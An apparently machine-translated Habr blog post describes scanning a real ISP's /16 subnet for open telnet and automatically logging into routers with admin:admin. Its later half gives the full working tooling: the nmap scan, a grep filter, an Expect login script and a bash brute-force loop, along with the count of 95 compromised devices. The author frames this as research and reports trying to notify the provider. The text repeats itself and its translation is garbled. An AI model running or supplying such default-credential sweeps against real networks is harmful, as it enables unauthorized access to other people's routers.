Automatic search for routers with standard passwords
Recently, a banal idea occurred to me that most people put their routers on the settings, and they can be accessed using default passwords. And how many of these routers in addition are open to the entrance from the Internet, which makes them a passing yard? And how to quickly check it?
So, the task: scan some subnet and find vulnerable routers.
Execution conditions: no more than a few hours (summer is still outside), using only standard Linux tools. Yes, I am aware of projects like Kali and “hacker” software cars in them, but I couldn’t find the right program that would do it right “out of the box”, but time goes on ... Yes, and it's more interesting.
')
The first thought that comes to mind is: scan nmap over the open port 80. But what to do with a huge zoo web mord? After all, the goal is not to write a universal combine-destroyer of routers, but a small proof-of-concept. Is there any unified authorization system on routers? Of course there is - Telnet! Getting started!
We select the victims: we enter the "address range" into Google "provider_name". I chose a provider with the letter “U” and one of its subnets of the form XX.XX.00.00 / 16, that is, as many as ~ 65536 addresses.
So we are looking for routers (and any other hardware) with an open 23 port (Telnet), and the key
It takes a little more than 40 minutes, and a list of 2100 addresses on our desktop. A total of 18,000 hosts were available.
For our purposes, the nmap exhaust is too motley, you can't feed it to the script, you only need to weed out addresses. With this cope irreplaceable grep, namely:
A regular expression can frighten a beginner grepovtsa, but in fact it is very simple: a block of the form “from one to three digits + dot” three times + the block “from one to three digits”. The
You can relax a bit and manually connect to the IP data using telnet. In some places the connection is broken, but it connects a lot where. Moreover, out of a dozen IPs that have already been tried, two have already turned out to be working routers with automatic login and password admin, which is good news.
Someone would stop at this, but not only we, because our goal is not to manage in foreign routers, but a more elevated one is statistical research.
Attempts to automate telnet's “in the forehead” were unsuccessful: it was just not possible to wrap it in the bash script. The problem was in automatic password substitution: all methods known to me (pipes, ekhi and kets) did not work here. I had to discover unknown ways for myself: Expect is a tool for automation and testing in Unix OS, written by Don Libes as an extension to the Tcl script language, for interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, ssh, and others . In the article from Wikipedia, the first example is the automatic authorization via telnet - well, just a gift. The code had to be “filed” a little to fit my needs, the already finished program body for iteration: the executable file try_telnet
The expect command follows its literal meaning: it waits for an invitation to enter a login and password, and then to enter commands. If a shell is received, then the script happily reports this to the general output stream with a string, which is then convenient to use.
Interesting fact: in Wikipedia and other resources, the "#" is specified as a shell marker. By experiments, it turned out that this method does not work on a large proportion of vulnerable routers, namely TP-LINK, which give an invitation to enter commands of the form
However, the ">" token is universal - it also works on the recognized D-Link, which give an invitation like
It remains only to write a single-line bash: brute executable file
And run
In stderr, the script swears in the case of connection refused - do not pay attention. The useful work of the script can be observed live in the out.txt file (remembering to update it periodically).
35 minutes pass and the script exits. Sift the result with
We get 95 routers with admin authorization: admin - the goal is reached.
As a result, out of 18,000 addresses, 95 routers turned out to be accessible from anywhere in the world by admin: admin. Everyone's web interface is also open. Is it a lot or a little? I remind you that we were looking only for routers with open telnet, and tried only one standard bundle for authorization (albeit the most common).
Basically, TP-LINK and D-link routers of various models were vulnerable. If you have such a router, then it is worth checking out! Also found a few ZyXEL, Huawei, Asotel, ZTE.
In conclusion, I want to say that I honestly tried to inform the provider, but he does not have e-mail, only the form “for calls” with the mandatory fields “home address” and “phone”. Then a friend advised to write on Habrahabr. Thanks to all!
So, the task: scan some subnet and find vulnerable routers.
Execution conditions: no more than a few hours (summer is still outside), using only standard Linux tools. Yes, I am aware of projects like Kali and “hacker” software cars in them, but I couldn’t find the right program that would do it right “out of the box”, but time goes on ... Yes, and it's more interesting.
')
The first thought that comes to mind is: scan nmap over the open port 80. But what to do with a huge zoo web mord? After all, the goal is not to write a universal combine-destroyer of routers, but a small proof-of-concept. Is there any unified authorization system on routers? Of course there is - Telnet! Getting started!
We select the victims: we enter the "address range" into Google "provider_name". I chose a provider with the letter “U” and one of its subnets of the form XX.XX.00.00 / 16, that is, as many as ~ 65536 addresses.
nmap --open XX.XX.0.0/16 -p 23 > raw_log.txt So we are looking for routers (and any other hardware) with an open 23 port (Telnet), and the key
--open allows --open to display only the necessary addresses, which simplifies further processing.It takes a little more than 40 minutes, and a list of 2100 addresses on our desktop. A total of 18,000 hosts were available.
For our purposes, the nmap exhaust is too motley, you can't feed it to the script, you only need to weed out addresses. With this cope irreplaceable grep, namely:
grep -o -E '([0-9]{1,3}[\.]){3}[0-9]{1,3}' raw_log.txt > log.txt A regular expression can frighten a beginner grepovtsa, but in fact it is very simple: a block of the form “from one to three digits + dot” three times + the block “from one to three digits”. The
-o key displays only the found substring, which is what we need.You can relax a bit and manually connect to the IP data using telnet. In some places the connection is broken, but it connects a lot where. Moreover, out of a dozen IPs that have already been tried, two have already turned out to be working routers with automatic login and password admin, which is good news.
Someone would stop at this, but not only we, because our goal is not to manage in foreign routers, but a more elevated one is statistical research.
Attempts to automate telnet's “in the forehead” were unsuccessful: it was just not possible to wrap it in the bash script. The problem was in automatic password substitution: all methods known to me (pipes, ekhi and kets) did not work here. I had to discover unknown ways for myself: Expect is a tool for automation and testing in Unix OS, written by Don Libes as an extension to the Tcl script language, for interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, ssh, and others . In the article from Wikipedia, the first example is the automatic authorization via telnet - well, just a gift. The code had to be “filed” a little to fit my needs, the already finished program body for iteration: the executable file try_telnet
#!/usr/bin/expect -f set SERVER [lindex $argv 0]; set USER [lindex $argv 1]; set PASS [lindex $argv 2]; set timeout 1 spawn telnet $SERVER expect ":" send "$USER\r" expect ":" send "$PASS\r" expect ">" {puts "\nFOUND $SERVER $USER:$PASS\n"; exit 0} exit 1 The expect command follows its literal meaning: it waits for an invitation to enter a login and password, and then to enter commands. If a shell is received, then the script happily reports this to the general output stream with a string, which is then convenient to use.
Interesting fact: in Wikipedia and other resources, the "#" is specified as a shell marker. By experiments, it turned out that this method does not work on a large proportion of vulnerable routers, namely TP-LINK, which give an invitation to enter commands of the form
TP-LINK> However, the ">" token is universal - it also works on the recognized D-Link, which give an invitation like
DSL-2600U# It remains only to write a single-line bash: brute executable file
#!/bin/bash while read line; do ./try_telnet $line admin admin; done < log.txt And run
./brute > out.txt In stderr, the script swears in the case of connection refused - do not pay attention. The useful work of the script can be observed live in the out.txt file (remembering to update it periodically).
35 minutes pass and the script exits. Sift the result with
grep 'FOUND' out.txt > final.txt We get 95 routers with admin authorization: admin - the goal is reached.
As a result, out of 18,000 addresses, 95 routers turned out to be accessible from anywhere in the world by admin: admin. Everyone's web interface is also open. Is it a lot or a little? I remind you that we were looking only for routers with open telnet, and tried only one standard bundle for authorization (albeit the most common).
Basically, TP-LINK and D-link routers of various models were vulnerable. If you have such a router, then it is worth checking out! Also found a few ZyXEL, Huawei, Asotel, ZTE.
In conclusion, I want to say that I honestly tried to inform the provider, but he does not have e-mail, only the form “for calls” with the mandatory fields “home address” and “phone”. Then a friend advised to write on Habrahabr. Thanks to all!
Source: https://habr.com/ru/post/263089/
All Articles